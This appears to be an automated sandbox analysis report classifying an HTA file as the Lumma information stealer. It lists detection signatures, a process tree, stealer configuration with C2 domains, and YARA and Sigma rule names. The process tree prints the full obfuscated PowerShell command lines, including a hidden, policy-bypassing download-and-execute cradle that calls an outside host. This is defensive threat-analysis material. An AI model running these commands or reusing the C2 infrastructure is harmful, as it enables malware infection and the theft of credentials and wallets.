Windows
Analysis Report
web55.mp4.hta
Overview
General Information
Detection
Detection | Score | Range | Whitelisted | Confidence |
---|---|---|---|---|
LummaC | 100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
.NET source code contains very large array initializations
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to modify clipboard data
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 6976 cmdline: mshta.exe "C:\Users\user\Desktop\web55.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 7324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ep Unrestricted -w 1 sc $env:Temp\a.ps1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gS0ZiQygkS3lHWXJVVUQpew0KKCgkS3lHWXJVVUQgLXNwbGl0ICcoPzw9XEcuLiknfCV7JEVKdXAuU3ViU3RyaW5nKDMsMTAwKVskX119KSAgLWpvaW4gJycgLXJlcGxhY2UgIi4kIil9OyRFSnVwID0naWV4bXZ7dU4xaUtGZSJBT0V1Vnk1Im9ZezZQbFBhLzphYjRJWi5PYjJxLTdXO0NkSFxneFF3L016SkFqcnQzQDZCfUROJX5UblUofTBRc3NfaCVoSWZrKWM5WEw4NCNAUnlTKm9HcDY1MDk1ODM0NDEwOTM2NDMyNDA2MDk2OTU4Jw==')));cmd.exe /k start powershell -w 1 ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtZW5jIFV3QjBBR0VBY2dCMEFDMEFVQUJ5QUc4QVl3QmxBSE1BY3dBZ0FDSUFRd0E2QUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUZNQWVRQnpBRmNBYndCM0FEWUFOQUJjQUZjQWFRQnVBR1FBYndCM0FITUFVQUJ2QUhjQVpRQnlBRk1BYUFCbEFHd0FiQUJjQUhZQU1RQXVBREFBWEFCd0FHOEFkd0JsQUhJQWN3Qm9BR1VBYkFCc0FDNEFaUUI0QUdVQUlnQWdBQzBBUVFCeUFHY0FkUUJ0QUdVQWJnQjBBRXdBYVFCekFIUUFJQUFpQUMwQWR3QWdBR2dBYVFCa0FHUUFaUUJ1QUNBQUxRQmxBSEFBSUFCaUFIa0FjQUJoQUhNQWN3QWdBQzBBYmdCdkFIQUFJQUF0QUVNQWJ3QnRBRzBBWVFCdUFHUUFJQUJgQUNJQWFRQmxBSGdBSUFBb0FDZ0FUZ0JsQUhjQUxRQlBBR0lBYWdCbEFHTUFkQUFnQUZNQWVRQnpBSFFBWlFCdEFDNEFUZ0JsQUhRQUxnQlhBR1VBWWdCREFHd0FhUUJsQUc0QWRBQXBBQzRBUkFCdkFIY0FiZ0JzQUc4QVlRQmtBRk1BZEFCeUFHa0FiZ0JuQUNnQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QWR3QmxBR0lBTGdCckFHd0FhUUJ3QUdRQWVRQjNBRzhBZWdCcEFIa0FMZ0J6QUdnQWJ3QndBQzhBYXdCMUFHNEFiZ0JoQUhJQUxnQndBRzRBWndBbkFDa0FLUUJgQUNJQUlnQWdBQzBBVndCcEFHNEFaQUJ2QUhjQVV3QjBBSGtBYkFCbEFDQUFTQUJwQUdRQVpBQmxBRzRBOy4gJGVudjpUZW1wXGEucHMxOyBmdW5jdGlvbiBLeUdZclVVRCgpe2Z1bmN0aW9uIGV6cENNZGhHUSgkckhQZWIpe2lmKCEoVGVzdC1QYXRoIC1QYXRoICRUaEJFWHBpVk8pKXtjdXJsIChLRmJDICRySFBlYikgLW8gJFRoQkVYcGlWT319fUt5R1lyVVVEOw=='))) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7460 cmdline: "C:\Windows\system32\cmd.exe" /k start powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 7476 cmdline: powershell -w 1 "powershell -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A;. $env:Temp\a.ps1; function KyGYrUUD(){function ezpCMdhGQ($rHPeb){if(!(Test-Path -Path $ThBEXpiVO)){curl (KFbC $rHPeb) -o $ThBEXpiVO}}}KyGYrUUD;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAFcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAiAC0AdwAgAGgAaQBkAGQAZQBuACAALQBlAHAAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAEMAbwBtAG0AYQBuAGQAIABgACIAaQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AdwBlAGIALgBrAGwAaQBwAGQAeQB3AG8AegBpAHkALgBzAGgAbwBwAC8AawB1AG4AbgBhAHIALgBwAG4AZwAnACkAKQBgACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4A MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- powershell.exe (PID: 7700 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://web.klipdywoziy.shop/kunnar.png'))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 7508 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- 2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe (PID: 6680 cmdline: "C:\Users\user~1\AppData\Local\Temp\2AZA84BP4AM1TVWCT7DQB9ZWGJA.exe" MD5: 89470385FDDACB118DEB7A7941E6A666)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution | | |
{"C2 url": ["femalsabler.shop", "soundtappysk.shop", "quinceisoz.cam", "versersleep.shop", "robinsharez.shop", "apporholis.shop", "handscreamny.shop", "crowdwarek.shop", "chipdonkeruz.shop"], "Build id": "WG6I6S--web55"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | ||
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |